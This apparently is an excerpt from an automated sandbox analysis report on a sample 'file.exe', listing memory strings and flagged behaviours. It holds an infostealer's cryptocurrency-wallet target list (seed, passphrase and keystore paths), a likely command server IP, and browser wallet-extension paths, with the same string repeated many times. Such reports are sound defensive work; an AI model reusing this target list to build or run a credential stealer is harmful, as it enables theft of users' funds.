Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2409398510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 16.113Users\user\AppData\Roaming\Exodus\window-state.json
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2409398510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 16.113Users\user\AppData\Roaming\Exodus\window-state.json
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2409398510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16fons\AppData\Roaming\Coinomi\Coinomi\wallets\.;
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2409398510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.
Source: file.exe, 00000000.00000002.2407206885.000000000066C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
